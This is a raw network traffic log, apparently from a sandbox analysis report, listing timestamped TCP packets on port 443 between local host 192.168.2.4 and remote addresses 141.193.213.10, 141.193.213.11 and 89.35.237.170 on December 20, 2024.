                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.602396011 CET49759443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.602447033 CET49760443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.602452993 CET49761443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.602857113 CET49759443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.602874994 CET44349759141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.603063107 CET49760443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.603077888 CET44349760141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.603099108 CET44349753141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.603228092 CET49761443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.603247881 CET44349761141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.603281021 CET49753443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.603588104 CET49753443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.603605032 CET44349753141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.607099056 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.607108116 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.607225895 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.607654095 CET49763443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.607676983 CET44349763141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.607817888 CET49763443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.607947111 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.607959032 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.608315945 CET49763443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.608330965 CET44349763141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.611915112 CET49764443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.611958027 CET44349764141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.612077951 CET49764443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.612412930 CET49764443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.612437963 CET44349764141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.646929979 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.646950960 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.673443079 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.673527956 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.673564911 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.673583031 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.675911903 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.680062056 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.688138962 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.688306093 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.688335896 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.696263075 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.696543932 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.696573019 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.704482079 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.704648972 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.704663038 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.712620020 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.712771893 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.712805986 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.728704929 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.728843927 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.728990078 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.729007959 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.731266022 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.736921072 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.744697094 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.744896889 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.745012045 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.745028973 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.745150089 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.752382994 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.760405064 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.761903048 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.761918068 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.802926064 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.802947044 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.850044966 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.861685038 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.864422083 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.868823051 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.868865013 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.868904114 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.868985891 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.868999004 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.873868942 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.875922918 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.875936985 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.883285046 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.883497000 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.883510113 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.883693933 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.892230988 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.892251015 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.893301010 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.893316031 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.897447109 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.900784016 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.900794983 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.900934935 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.909432888 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.909442902 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.910423040 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.913908005 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.913917065 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.914088964 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.922578096 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.922586918 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.923162937 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.931225061 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.932907104 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.935549021 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.935657978 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.935911894 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.955912113 CET49752443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:43.955960989 CET44349752141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.056181908 CET4434975589.35.237.170192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.084036112 CET49755443192.168.2.489.35.237.170
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.084059000 CET4434975589.35.237.170192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.087985039 CET4434975589.35.237.170192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.092048883 CET49755443192.168.2.489.35.237.170
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.092048883 CET49755443192.168.2.489.35.237.170
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.092293024 CET4434975589.35.237.170192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.092356920 CET49755443192.168.2.489.35.237.170
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.132909060 CET49755443192.168.2.489.35.237.170
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.132930994 CET4434975589.35.237.170192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.185007095 CET49755443192.168.2.489.35.237.170
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.659792900 CET44349757141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.660202026 CET49757443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.660227060 CET44349757141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.660619974 CET44349757141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.660995007 CET49757443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.661057949 CET44349757141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.661202908 CET49757443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.661880970 CET44349756141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.662095070 CET49756443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.662147045 CET44349756141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.663269043 CET44349756141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.663614035 CET49756443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.663733006 CET49756443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.663744926 CET44349756141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.663800001 CET44349756141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.665482044 CET44349758141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.665715933 CET49758443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.665754080 CET44349758141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.666856050 CET44349758141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.667188883 CET49758443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.667352915 CET49758443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.667365074 CET44349758141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.667399883 CET44349758141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.707343102 CET44349757141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.708699942 CET49756443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.708753109 CET49758443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.725971937 CET4434975589.35.237.170192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.726027966 CET4434975589.35.237.170192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.726165056 CET4434975589.35.237.170192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.726246119 CET49755443192.168.2.489.35.237.170
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.726246119 CET49755443192.168.2.489.35.237.170
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.727348089 CET49755443192.168.2.489.35.237.170
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.727387905 CET4434975589.35.237.170192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.832449913 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.832645893 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.832705021 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.833537102 CET44349760141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.833942890 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.834023952 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.835952997 CET49760443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.835968018 CET44349760141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.836256981 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.836359024 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.836384058 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.836437941 CET44349761141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.836594105 CET49761443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.836606979 CET44349761141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.837297916 CET44349763141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.837470055 CET49763443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.837490082 CET44349763141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.837656021 CET44349760141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.837722063 CET49760443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.837982893 CET44349763141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.838015079 CET44349764141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.838033915 CET49760443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.838118076 CET44349760141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.838295937 CET44349759141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.838443995 CET44349761141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.838481903 CET49763443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.838512897 CET49761443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.838568926 CET44349763141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.838706970 CET49764443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.838768005 CET44349764141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.838852882 CET49759443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.838865042 CET44349759141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.839134932 CET49761443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.839237928 CET44349761141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.839245081 CET49760443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.839267969 CET44349760141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.839304924 CET49763443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.839494944 CET49761443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.839504004 CET44349761141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.840253115 CET44349764141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.840318918 CET49764443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.840326071 CET44349759141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.840389013 CET49759443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.840615988 CET49764443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.840703011 CET44349764141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.840976954 CET49759443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.841063023 CET44349759141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.841105938 CET49764443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.841120958 CET44349764141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.841149092 CET49759443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.841157913 CET44349759141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.879359007 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.879404068 CET44349763141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.886559010 CET49759443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.886563063 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.886563063 CET49760443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.886584997 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.886625051 CET49761443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.886744976 CET49764443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:44.929032087 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.107163906 CET44349757141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.107196093 CET44349757141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.107243061 CET49757443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.107271910 CET44349757141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.107285023 CET44349757141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.107331991 CET49757443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.108088970 CET49757443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.108102083 CET44349757141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.108643055 CET44349756141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.108764887 CET44349756141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.108820915 CET49756443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.108858109 CET44349756141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.109019995 CET44349756141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.109461069 CET49756443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.113256931 CET49766443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.113336086 CET44349766141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.113419056 CET49766443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.113718987 CET49766443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.113750935 CET44349766141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.114162922 CET49756443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.114191055 CET44349756141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.118518114 CET49767443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.118599892 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.118669987 CET49767443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.118971109 CET49767443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.119002104 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.122750044 CET49768443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.122772932 CET44349768141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.122839928 CET49768443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.123150110 CET49768443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.123179913 CET44349768141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.124382019 CET49769443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.124403954 CET44349769141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.124485970 CET49769443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.124722958 CET49769443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.124748945 CET44349769141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.141094923 CET44349758141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.141225100 CET44349758141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.141290903 CET49758443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.141325951 CET44349758141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.141458035 CET44349758141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.141510963 CET49758443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.141525030 CET44349758141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.141608953 CET44349758141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.141663074 CET49758443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.141674995 CET44349758141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.141865015 CET44349758141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.141921997 CET49758443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.142081976 CET49758443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.142110109 CET44349758141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.281591892 CET44349761141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.281724930 CET44349761141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.281775951 CET49761443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.282821894 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.282860994 CET44349762141.193.213.10192.168.2.4
